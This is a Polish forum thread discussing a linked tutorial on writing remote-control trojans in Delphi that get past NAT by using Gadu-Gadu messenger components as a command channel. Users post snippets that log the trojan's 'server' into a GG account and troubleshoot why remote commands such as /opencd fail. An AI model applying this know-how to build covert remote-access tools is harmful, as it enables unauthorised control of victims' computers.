Artykuł o pisaniu trojanów za natem część I

[DarkShadow]

Już jest artykuł o pisaniu trojanów, bardzo dlugi opisujemy w nim
jak zrobić trojana działajcego za natem. Na rózne sposoby
1.) Uzycie darmowego komponentu THGG
2.) Uzycie płatnego komponentu GGLitle
3.) Uzycie darmowych komponentów obsługujących www/ftp

W następnej czesci artykułu który już jest prawie gotowy opisane będzie.
Wykorzystanie IRC, stworzenie konfiguratora pliku, wykorzystanie socketów w ten sposob aby ominać nat i wiele innych. Zapraszam do przeczytania czesci I tego artykułu, nastepnie w innym terminie czesci drugiej.

Link dala wam poniższa osoba.

 

[Kornik52]

Artykuł dostepny jest pod ponizszym linkiem bo ten wyżej nie zawsze działa Pisanie trojanów działających za natem (w Delphi)

 

[aaabyyy]

Ehh, ciężko pozbyć się przydomka mafioza

Zaczałem od przeanalizowania HGG, ściągnąłem żródła, utworzyłem z nich klienta i server (server mam zamiar testować na sobie).

W serverze zamiast tego:

procedure TForm1.Polacz;

begin

HGG1.Number:=StrToInt(Edit1.Text); //numer GG

HGG1.Password:=Edit2.Text; //Hasełko

HGG1.Host:='217.17.41.93'; //IP serwera GG

HGG1.Port:=8074; //port serwera

try // sprobujemy sie polaczyc

HGG1.Connect();

except

exit; //nie rób nic

end;

end;

wpisałem to:

procedure TForm1.Polacz;

begin

HGG1.Number:=237564; //numer GG dla servera który przed chwilą utworzyłem

HGG1.Password:='klozet'; //Hasełko GG dla servera który przed chwilą utworzyłem

HGG1.Host:='87.207.104.41'; //IP serwera GG czyli daję mój IP bo na sobie testuję

HGG1.Port:=8074; //port serwera

try // sprobujemy sie polaczyc

HGG1.Connect();

except

exit; //nie rób nic

end;

end;

Odpalam server na swoim kompie, potem klienta (wpisuje na górze nr i hasło servera, na dole mój nr gg) do swojego gg w kontaktach wpisuję nr servera (237564).
Dziwią mnie następująca rzeczy:

1.Gdy wciskam OtwórzCD/ZamknijCD to na moje gg server wysyła "/opencd" lub "/closecd". Przecież po naciśnięciu OtwórzCD server ma wykonać operację otwierająca CD a nie przesyłać mi wiadomość.

2.Gdy przez swoje gg wysyłam na nr servera komendę np. /opencd to nic się nie dzieje.

PS. Za każdą pomoc naciskam "pomógł" Przykłady numerów gg i haseł zmyślone

 

[_MaVeR_]

no bo ty zrobiles zeby odsylal wiadomosc a nie otwieral

ps. i tak nieklikniesz ;] bo niezalozyles tematu

 

[D0han]

HGG1.Host:='87.207.104.41'; //IP serwera GG czyli daję mój IP bo na sobie testuję

Zle, to nie ma byc twoje IP tylko servera GG. Nie serwer trojana a serwer GG ktorego raczej nie masz u siebie :-D

 

[Kornik52]

a ip serwera gg:

217.17.41.93

 

[aaabyyy]

Dobra - żeby za bardzo nie kombinować jeszcze raz sciągnąłem źródła servera i klienta (HGG). Tym razem nie grzebałem nic w kodzie, po prostu otworzyłem projekt servera i TYLKO zrobiłem to (tak jak pisze na stronie):

object inspector - Edit1 - pole text - wpisałem nr gg servera
object inspector - Edit2 - pole text - wpisałem hasło servera

Zapisałem wszystko, potem CTRL+F9. Odpaliłem klienta, odpaliłem server i dalej to samo. Na tym rysunku to dokładniej przedstawiam:

http://img66.imageshack.us/img66/9392/aaabbb1xh.jpg

Czy ja coś źle robię czy coś żle tam jest??? Niech ktoś sprawdzi.......

 

[Kornik52]

A czemu serwer na screenie jest niedostepny? Jezeli serwer byl dostepny to dobrze czemu na obrazku 1 w polu pisze "moj numer gg" tam ma byc numer gg serwera. I wszystko powinno byc dobrze

 

[aaabyyy]

Na obrazku na początku nie podawałem wszystkich danych (zastępowałem napisami) ale na ostatnim się walnąłem

Zaraz to poprawie

Server po odpaleniu na kompie nie zmienił jego statusu gg

ale za to po 30 min (kiedy dawno już wszystko powyłączałem) nagle server zrobił się dostępny na chwilę (chyba że ktoś z was wchodził).

Niemożliwe że źle robię (co tu można spieprzyć przecież???).

 

[aaabyyy]

heh to samo jest z programem z komponentem GGlite - ściągam źródełka, otwieram i zmieniam w Delphi tylko:

object inspector - edit1- text - wpisuję nr nowo utworzonego gg
object inspector - edit2- text - wpisuję hasło nowo utworzonego gg
object inspector - edit3- text - wpisuję nr swojego gg

Odpala się bez błędu lecz nie łączy się z numerem gg z edit1 (w gg nie zmienia statusu). Coście musieliście namieszać w źródełkach bo jak sam robiłem tylko to:

gg.login := StrToInt(edit1.Text); // przypisujemy wartosc login w komponencie do edit1 
gg.password := Edit2.Text; // przypisujemy wartosc password w komponencie do edit2 
gg.GGInitHost; // host gg 
gg.GGLogon; // laczymy sie.. 
gg.GGChangeUserStatus; // zmieniamy status na dostepny.


...to server gg zmieniał status.....

 

[FDJ]

W źródłach jest blad wiec jak nie umiesz go naprawic to zajmij sie czyms innym :]

/red_ag

 

[Kornik52]

ale za to po 30 min (kiedy dawno już wszystko powyłączałem) nagle server zrobił się dostępny na chwilę (chyba że ktoś z was wchodził).[/b]

Ja weszlem tym klientem na ten numer, bo az chcialem sprawdzic

mi dzialalo.

 

[aaabyyy]

<div class='quotetop'>CYTAT("FDJ")</div>

W zrudlach jest blad wiec jak nie umiesz go naprawic to zajmij sie czyms innym :][/b]

postaram się go naprawić ale chodziło mi dokładniej o to żeby w końcu ktoś przyznał że źródełka są błędne

 

[Kornik52]

W GGlitle trzeba naprawic blad ale w HGG nic nie trzeba

 

[aaabyyy]

Robie tak jak pisze w artykule o GGLite (bo źródełka autor zamieścił błędne) i próbuję wszystko zapisać to:

http://img377.imageshack.us/img377/5332/aaaaaaaaaaaaa2tu.jpg

eee do kitu ten artykuł o pisaniu trojanów :-x
Dużo błędów które wprowadzają w błąd. Lepiej by było wymienić poszczególne procedury komponentów i opisać...

Nie dziwię się że jest pełno błędów bo jak autor sam komponent nazywa "GGLitle" to wszystko jasne....

 

[FDJ]

Specjalnie sa bledy w kodzie zeby zaden lamer czy jakis inny * :]
Nie mogl sobie skompilowac i mowic ze jest Chakerem bo umie trojana napisac.
A ja osobiscie uwazam ze ten artykul jest bardzo dobry tylko trzeba sie znac na delphi !!

 

[aaabyyy]

<div class='quotetop'>CYTAT("FDJ")</div>

Specjalnie sa bledy w kodzie zeby zaden lamer czy jakis inny * :]
Nie mogl sobie skompilowac i mowic ze jest Chakerem bo umie trojana napisac.[/b]

Przecież artykuł powstał aby uczyć początkujących......

 

[Kornik52]

Eh, wazne ze jest to co jest

Moze w przyszlosci poprawi sie :]

 

[FDJ]

Przecież artykuł powstał aby uczyć początkujących......[/b]

Poczatkujacych ,a nie kogos kto sciagnal przed chwila delphi i szpanuje ze jest ch4Ck3r.
Naucz sie najpierw podstaw to nie bedzie potem problemow!!!!!!!!!

 

[bobikrk]

Dokładnie, artykuł jest bardzo dobrze i jasno opisany, dla znających delphi 0 problemów.